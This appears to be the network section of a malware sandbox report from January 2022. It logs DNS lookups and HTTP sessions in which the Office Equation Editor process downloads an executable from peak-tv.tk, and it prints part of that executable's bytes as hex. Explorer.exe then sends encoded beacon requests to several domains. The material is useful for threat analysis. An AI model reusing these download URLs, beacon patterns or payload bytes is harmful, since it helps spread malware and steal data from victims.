                                                                          Jan 13, 2022 18:17:00.061178923 CET192.168.2.228.8.8.80x65b0Standard query (0)peak-tv.tkA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:34.665961027 CET192.168.2.228.8.8.80xfc43Standard query (0)www.prestigiousuniforms.comA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:53.462610960 CET192.168.2.228.8.8.80x9c63Standard query (0)www.muzicalbox.comA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:58.635457993 CET192.168.2.228.8.8.80x30e0Standard query (0)www.extraordinarymiracle.comA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:03.935352087 CET192.168.2.228.8.8.80x9037Standard query (0)www.realstakepool.comA (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:09.561289072 CET192.168.2.228.8.8.80xce43Standard query (0)www.danielkcarter.storeA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          Jan 13, 2022 18:17:00.109055042 CET8.8.8.8192.168.2.220x65b0No error (0)peak-tv.tk2.58.149.41A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:34.698467016 CET8.8.8.8192.168.2.220xfc43No error (0)www.prestigiousuniforms.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 13, 2022 18:18:34.698467016 CET8.8.8.8192.168.2.220xfc43No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:53.484441042 CET8.8.8.8192.168.2.220x9c63No error (0)www.muzicalbox.commuzicalbox.comCNAME (Canonical name)IN (0x0001)
                                                                          Jan 13, 2022 18:18:53.484441042 CET8.8.8.8192.168.2.220x9c63No error (0)muzicalbox.com34.102.136.180A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:18:58.766792059 CET8.8.8.8192.168.2.220x30e0No error (0)www.extraordinarymiracle.com109.94.209.123A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:03.973486900 CET8.8.8.8192.168.2.220x9037No error (0)www.realstakepool.com91.195.240.13A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:09.586139917 CET8.8.8.8192.168.2.220xce43No error (0)www.danielkcarter.store172.67.181.75A (IP address)IN (0x0001)
                                                                          Jan 13, 2022 18:19:09.586139917 CET8.8.8.8192.168.2.220xce43No error (0)www.danielkcarter.store104.21.83.204A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • peak-tv.tk
                                                                          • www.prestigiousuniforms.com
                                                                          • www.muzicalbox.com
                                                                          • www.extraordinarymiracle.com
                                                                          • www.realstakepool.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.22491672.58.149.4180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:17:00.157764912 CET0OUTGET /medicomzx.exe HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                          Host: peak-tv.tk
                                                                          Connection: Keep-Alive
                                                                          Jan 13, 2022 18:17:00.184818029 CET2INHTTP/1.1 200 OK
                                                                          Date: Thu, 13 Jan 2022 17:17:00 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Tue, 11 Jan 2022 16:19:34 GMT
                                                                          ETag: "aca00-5d550d19904c2"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 707072
                                                                          Keep-Alive: timeout=5, max=100
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/octet-stream
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed 9c dd 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 b4 0a 00 00 14 00 00 00 00 00 00 d6 d2 0a 00 00 20 00 00 00 e0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 d2 0a 00 4f 00 00 00 00 e0 0a 00 a8 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc b2 0a 00 00 20 00 00 00 b4 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a8 10 00 00 00 e0 0a 00 00 12 00 00 00 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0b 00 00 02 00 00 00 c8 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 d2 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 0c f4 01 00 18 bb 02 00 03 00 00 00 cb 02 00 06 24 af 04 00 60 23 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 22 00 00 0a 2a 26 00 02 28 23 00 00 0a 00 2a ce 73 24 00 00 0a 80 01 00 00 04 73 25 00 00 0a 80 02 00 00 04 73 26 00 00 0a 80 03 00 00 04 73 27 00 00 0a 80 04 00 00 04 73 28 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 29 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 2b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 2c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 2d 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 2e 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2f 00 00 0a 6f 30 00 00 0a 73 31 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 25 00 00 70 7e 07 00 00 04 6f 32 00 00 0a 28 33 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 56 73 0e 00 00 06 28 34 00 00 0a 74 06 00 00 02 80 08 00 00 04 2a 1e 02 28 35 00 00 0a 2a 13 30 01 00 0b 00 00 00 09 00 00 11 00 7e 08 00 00 04 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 28 0f 00 00 06 0a 2b 00 06 2a 00 1b 30 02 00 31 00 00 00 0a 00 00 11 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELaP @ @O H.text `.rsrc@@.reloc@BH$`#("*&(#*s$s%s&s's(*0~o)+*0~o*+*0~o++*0~o,+*0~o-+*0<~(.,!rp(/o0s1~+*0~+*"*0&(r%p~o2(3t$+*Vs(4t*(5*0~+*0(+*01
                                                                          Jan 13, 2022 18:17:00.184843063 CET3INData Raw: 00 03 2c 0b 02 7b 09 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0d 02 7b 09 00 00 04 6f 36 00 00 0a 00 00 00 de 0a 00 02 03 28 37 00 00 0a 00 dc 00 2a 00 00 00 01 10 00 00 02 00 01 00 24 25 00 0a 00 00 00 00 13 30 05 00 0a 07 00 00 00 00 00 00 00 02 73
                                                                          Data Ascii: ,{+,{o6(7*$%0s8}s9os9os:os9os9os9os;o {s<o"s=o$s:o&o!o>(>or
                                                                          Jan 13, 2022 18:17:00.184859991 CET4INData Raw: 00 00 06 1f 7d 1f 1a 73 44 00 00 0a 6f 45 00 00 0a 00 02 6f 23 00 00 06 72 ed 01 00 70 6f 55 00 00 0a 00 02 6f 23 00 00 06 1f 7c 1f 16 73 44 00 00 0a 6f 56 00 00 0a 00 02 6f 23 00 00 06 72 19 02 00 70 6f 57 00 00 0a 00 02 6f 25 00 00 06 1f 0a 6f
                                                                          Data Ascii: }sDoEo#rpoUo#|sDoVo#rpoWo%oIo%oKo%r/p"As?o@o% sAoBo%r-poCo%csDoEo%oFo%rQpoLo%oMo
                                                                          Jan 13, 2022 18:17:00.184878111 CET6INData Raw: 0a 00 25 16 6f 83 00 00 0a 00 25 17 6f 84 00 00 0a 00 13 04 11 04 6f 85 00 00 0a 72 bf 03 00 70 6f 86 00 00 0a 1f 78 6f 87 00 00 0a 00 11 04 6f 85 00 00 0a 72 c9 03 00 70 6f 86 00 00 0a 20 87 00 00 00 6f 87 00 00 0a 00 11 04 6f 85 00 00 0a 72 d7
                                                                          Data Ascii: %o%oorpoxoorpo oorpo 'oo%rp%rp%rpsooo%rmp%rp%rpsooo%rp%rp%r
                                                                          Jan 13, 2022 18:17:00.184895039 CET7INData Raw: 00 16 16 16 16 73 9c 00 00 0a 28 30 00 00 06 00 00 2a 00 00 00 13 30 02 00 52 00 00 00 11 00 00 11 00 04 6f 9d 00 00 0a 20 00 00 10 00 fe 01 0a 06 2c 3e 03 74 1f 00 00 02 0b 07 6f 93 00 00 0a 6f 94 00 00 0a 17 fe 01 0c 08 2c 23 07 6f 93 00 00 0a
                                                                          Data Ascii: s(0*0Ro ,>too,#ooooo(r&*z(}}}*0R{{=o$,{{<o.+,{{=o%{{=o&*
                                                                          Jan 13, 2022 18:17:00.184906960 CET8INData Raw: 07 03 28 b1 00 00 0a 74 40 00 00 02 0c 02 7c 29 00 00 04 08 07 28 06 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 1a 00 00 11 02 7b 29 00 00 04 0a 06 0b 07 03 28 b3 00 00 0a 74 40 00 00 02 0c 02 7c 29 00 00 04 08 07 28 06 00 00 2b
                                                                          Data Ascii: (t@|)(+3*0){)(t@|)(+3*0{+*0{{<o,+*0{+*0{+*0*0{+*
                                                                          Jan 13, 2022 18:17:00.184923887 CET10INData Raw: 05 38 9b 00 00 00 00 02 7b 19 00 00 04 0c 08 2c 7e 02 7b 1e 00 00 04 14 fe 01 0d 09 2c 44 02 72 47 09 00 70 73 b5 00 00 0a 6f b6 00 00 0a 13 04 12 04 28 b7 00 00 0a 28 b4 00 00 0a 7d 1e 00 00 04 02 7b 23 00 00 04 72 51 09 00 70 72 4f 0b 00 70 72
                                                                          Data Ascii: 8{,~{,DrGpso((}{#rQprOprps1orGpso((}}+,(2*^{ o(2*0*0*0"*0
                                                                          Jan 13, 2022 18:17:00.184942007 CET11INData Raw: 6f 6a 00 00 06 20 30 01 00 00 1f 58 73 44 00 00 0a 6f 45 00 00 0a 00 02 6f 6a 00 00 06 17 6f 46 00 00 0a 00 02 6f 6c 00 00 06 1f 0d 6f 49 00 00 0a 00 02 6f 6c 00 00 06 1f 30 1e 73 41 00 00 0a 6f 42 00 00 0a 00 02 6f 6c 00 00 06 72 3c 0e 00 70 6f
                                                                          Data Ascii: oj 0XsDoEojoFoloIol0sAoBolr<poCol q'sDoEoloFolrRpoGoloHopoopoopr|pooroIoroD%oto
                                                                          Jan 13, 2022 18:17:00.184958935 CET13INData Raw: 0a 0a 02 7b 2c 00 00 04 0b 07 2c 07 07 06 6f 6d 00 00 0a 02 03 7d 2c 00 00 04 02 7b 2c 00 00 04 0b 07 2c 07 07 06 6f 6e 00 00 0a 2a 26 02 7b 2d 00 00 04 2b 00 2a 00 00 00 13 30 02 00 37 00 00 00 0d 00 00 11 02 fe 06 8a 00 00 06 73 6a 00 00 0a 0a
                                                                          Data Ascii: {,,om},{,,on*&{-+*07sj{-,om}-{-,on*&{.+*0R$ssj{.,oo}.{.,oo*&{/+*"
                                                                          Jan 13, 2022 18:17:00.184976101 CET14INData Raw: 00 00 00 0a 00 00 11 00 04 6f 9a 00 00 0a 1f 2e 33 0d 02 6f 76 00 00 06 6f f4 00 00 0a 2b 01 16 0a 06 2c 0a 02 14 14 28 84 00 00 06 00 00 00 2a 9e 00 04 02 6f 72 00 00 06 6f 85 00 00 0a 16 6f eb 00 00 0a 6f f5 00 00 0a 6f f6 00 00 0a 00 04 17 6f
                                                                          Data Ascii: o.3ovo+,(*orooooo*&(*{;so8{;so:*01,{<+,{<o6(7*$%0
                                                                          Jan 13, 2022 18:17:00.211577892 CET16INData Raw: 0a 00 02 6f a2 00 00 06 1c 6f 49 00 00 0a 00 02 6f a2 00 00 06 28 fa 00 00 0a 6f fb 00 00 0a 00 02 6f a2 00 00 06 1f 71 20 52 01 00 00 73 41 00 00 0a 6f 42 00 00 0a 00 02 6f a2 00 00 06 72 1c 11 00 70 6f 43 00 00 0a 00 02 6f a2 00 00 06 1f 18 1f
                                                                          Data Ascii: ooIo(ooq RsAoBorpoCosDoEooooooooIooD%ooooo(sAoBorpoCoo


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.224916823.227.38.7480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:18:34.728436947 CET749OUTGET /md4m/?o6=p4xWrkA40RaAiMZ6Ntaaay3F30x2NdNJQ5dt1rIhfvyBUiMTXG+B7J0pDtQSIysgwfDsvA==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.prestigiousuniforms.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 13, 2022 18:18:34.850775003 CET750INHTTP/1.1 403 Forbidden
                                                                          Date: Thu, 13 Jan 2022 17:18:34 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          X-Sorting-Hat-PodId: 179
                                                                          X-Sorting-Hat-ShopId: 59690647732
                                                                          X-Dc: gcp-europe-west1
                                                                          X-Request-ID: e3e3ac4d-8382-4b00-a294-d0a023d81b81
                                                                          X-Content-Type-Options: nosniff
                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                          X-XSS-Protection: 1; mode=block
                                                                          X-Download-Options: noopen
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Server: cloudflare
                                                                          CF-RAY: 6cd048db19b64333-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col
                                                                          Jan 13, 2022 18:18:34.850833893 CET751INData Raw: 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72
                                                                          Data Ascii: umn}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transiti
                                                                          Jan 13, 2022 18:18:34.850872040 CET753INData Raw: 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f 20 64 65 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 4e 6f 20 74 69 65 6e 65 73 20 70 65 72 6d 69
                                                                          Data Ascii: }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
                                                                          Jan 13, 2022 18:18:34.850908041 CET754INData Raw: e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 e0 a4 86 e0 a4 aa e0 a4 95 e0 a5 8b 20 e0 a4 87 e0 a4 b8 20 e0 a4 b5 e0 a5 87 e0 a4 ac e0 a4 b8 e0 a4 be e0
                                                                          Data Ascii: ", "content-title": " " }, "ja": { "title": "
                                                                          Jan 13, 2022 18:18:34.850936890 CET754INData Raw: 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 20 66 6f 72 20 28 76 61 72 20 69 64 20 69 6e 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 29 20 7b 0a 20 20 20 20 74 61 72 67 65 74 20 3d 20 64 6f 63 75
                                                                          Data Ascii: // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage docum
                                                                          Jan 13, 2022 18:18:34.850960016 CET755INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.224917034.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:18:53.504982948 CET755OUTGET /md4m/?o6=iLbGWxMFXdgKEpL2TSMWaw9OaDtRDyXHkSE5TtIvNbs2aDnrNryG0VWzTBZoyEuMZj5Q2g==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.muzicalbox.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 13, 2022 18:18:53.620393038 CET756INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Thu, 13 Jan 2022 17:18:53 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6192576d-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.2249171109.94.209.12380C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:18:58.849119902 CET757OUTGET /md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.extraordinarymiracle.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 13, 2022 18:18:58.928126097 CET757INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.20.1
                                                                          Date: Thu, 13 Jan 2022 17:18:58 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 169
                                                                          Connection: close
                                                                          Location: https://www.extraordinarymiracle.com:443/md4m/?o6=g4mIzHCmTqQfqybpH+qy2JB4BTiy5veIhmlYwoI1p7WHXjRjdWpxwA0RJbk1Zi8DwkVpDA==&WZ8=Jpspdz90i
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.224917291.195.240.1380C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 13, 2022 18:19:03.995932102 CET758OUTGET /md4m/?o6=iivCXU6wK9iYddcjehmaxCiNBPMMgXmeZKHdMU3TLXq0dC3uGVX9MdG5RNTIsnXyIv0bSw==&WZ8=Jpspdz90i HTTP/1.1
                                                                          Host: www.realstakepool.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 13, 2022 18:19:04.058167934 CET760INHTTP/1.1 200 OK
                                                                          Date: Thu, 13 Jan 2022 17:19:04 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Pragma: no-cache
                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2Mk9EhopbXMu42eavgK1yXE4PglsRvR8qjaVl2mNVBSizKR8WUmb1Wa+buflcm3md4clWQgYQYD4jU1VeTXlQg==
                                                                          Last-Modified: Thu, 13 Jan 2022 17:19:04 GMT
                                                                          X-Cache-Miss-From: parking-78bc4f798d-jmf9p
                                                                          Server: NginX
